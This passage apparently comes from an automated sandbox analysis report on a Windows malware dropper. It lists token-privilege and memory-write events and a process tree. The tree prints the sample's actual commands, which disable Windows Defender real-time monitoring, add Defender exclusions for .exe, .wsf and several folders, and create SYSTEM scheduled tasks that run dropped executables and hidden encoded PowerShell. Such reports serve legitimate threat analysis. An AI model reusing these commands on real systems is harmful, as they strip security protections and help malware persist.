fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe 2232 fFRTFEY.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeWMIC.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exepowershell.exeWMIC.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemProfilePrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeProfSingleProcessPrivilege 1612 WMIC.exe Token: SeIncBasePriorityPrivilege 1612 WMIC.exe Token: SeCreatePagefilePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeDebugPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeRemoteShutdownPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: 33 1612 WMIC.exe Token: 34 1612 WMIC.exe Token: 35 1612 WMIC.exe Token: SeDebugPrivilege 2340 powershell.exe Token: SeDebugPrivilege 2940 powershell.EXE Token: SeDebugPrivilege 1968 powershell.EXE Token: SeDebugPrivilege 1696 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1236 WMIC.exe Token: SeIncreaseQuotaPrivilege 1236 WMIC.exe Token: SeSecurityPrivilege 1236 WMIC.exe Token: SeTakeOwnershipPrivilege 1236 WMIC.exe Token: SeLoadDriverPrivilege 1236 WMIC.exe Token: SeSystemtimePrivilege 1236 WMIC.exe Token: SeBackupPrivilege 1236 WMIC.exe Token: SeRestorePrivilege 1236 WMIC.exe Token: SeShutdownPrivilege 1236 WMIC.exe Token: SeSystemEnvironmentPrivilege 1236 WMIC.exe Token: SeUndockPrivilege 1236 WMIC.exe Token: SeManageVolumePrivilege 1236 WMIC.exe Token: SeDebugPrivilege 996 powershell.EXE Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2876 WMIC.exe Token: SeIncreaseQuotaPrivilege 2876 WMIC.exe Token: SeSecurityPrivilege 2876 WMIC.exe Token: SeTakeOwnershipPrivilege 2876 WMIC.exe Token: SeLoadDriverPrivilege 2876 WMIC.exe Token: SeSystemtimePrivilege 2876 WMIC.exe Token: SeBackupPrivilege 2876 WMIC.exe Token: SeRestorePrivilege 2876 WMIC.exe Token: SeShutdownPrivilege 2876 WMIC.exe Token: SeSystemEnvironmentPrivilege 2876 WMIC.exe Token: SeUndockPrivilege 2876 WMIC.exe Token: SeManageVolumePrivilege 2876 WMIC.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2344 WMIC.exe Token: SeIncreaseQuotaPrivilege 2344 WMIC.exe Token: SeSecurityPrivilege 2344 WMIC.exe Token: SeTakeOwnershipPrivilege 2344 WMIC.exe Token: SeLoadDriverPrivilege 2344 WMIC.exe Token: SeSystemtimePrivilege 2344 WMIC.exe Token: SeBackupPrivilege 2344 WMIC.exe Token: SeRestorePrivilege 2344 WMIC.exe Token: SeShutdownPrivilege 2344 WMIC.exe Token: SeSystemEnvironmentPrivilege 2344 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exeInstall.exeInstall.execmd.exeforfiles.execmd.exeforfiles.execmd.exedescription pid process target process PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 1932 wrote to memory of 2072 1932 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2072 wrote to memory of 2556 2072 Install.exe Install.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2556 wrote to memory of 2676 2556 Install.exe cmd.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2692 2676 cmd.exe forfiles.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2692 wrote to memory of 2664 2692 forfiles.exe cmd.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2664 wrote to memory of 2612 2664 cmd.exe reg.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2676 wrote to memory of 2596 2676 cmd.exe forfiles.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2596 wrote to memory of 2968 2596 forfiles.exe cmd.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2968 wrote to memory of 2580 2968 cmd.exe reg.exe PID 2676 wrote to memory of 2728 2676 cmd.exe forfiles.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"C:\Users\Admin\AppData\Local\Temp\0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\7zS26F1.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\7zS2942.tmp\Install.exe.\Install.exe /KZqjdidXaW "385121" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2612
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2580
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2728
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2724
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2248
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2652
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2784
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2720
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2488
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2188
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:628
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:1276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1612 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\rtuESBK.exe\" PP /FOjdidlhWZ 385121 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1852 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"4⤵PID:1556
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn btZaCbGShXZoJDfvCg5⤵PID:2640
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn btZaCbGShXZoJDfvCg6⤵PID:1896
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 5124⤵
- Loads dropped DLL
- Program crash
PID:2620
-
C:\Windows\system32\taskeng.exetaskeng.exe {893782DE-EC95-4484-9934-D4B73CAFC0E2} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\rtuESBK.exeC:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\rtuESBK.exe PP /FOjdidlhWZ 385121 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2040
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:2024
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2884
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2776
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2788
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2792
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1208
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2224
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2336
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2228
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1108
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2764
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2880
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1972
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1876
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:596
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ghFlGFLqh" /SC once /ST 00:54:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:276 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ghFlGFLqh"3⤵PID:568
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ghFlGFLqh"3⤵PID:2860
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2316
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:892 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1928
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1872 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGOTxxsbu" /SC once /ST 00:36:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2084 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGOTxxsbu"3⤵PID:1656
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGOTxxsbu"3⤵PID:1616
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2540
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2992
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1236 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:1384
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1276 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:628
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1572 -
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:323⤵PID:2168
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:324⤵PID:2148
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:643⤵PID:2392
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\QqEAMUespgTHJnVz" /t REG_DWORD /d 0 /reg:644⤵PID:1896
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\QqEAMUespgTHJnVz\ecJaImkW\MUzkQwbpfLwEoyhe.wsf"3⤵PID:2640
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\QqEAMUespgTHJnVz\ecJaImkW\MUzkQwbpfLwEoyhe.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2872 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2756 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2912 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1208 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QtKEgKYoTGTqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1936 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2480 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEkGlaTFWGUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:576 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dlfHiRefefjU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2560 -
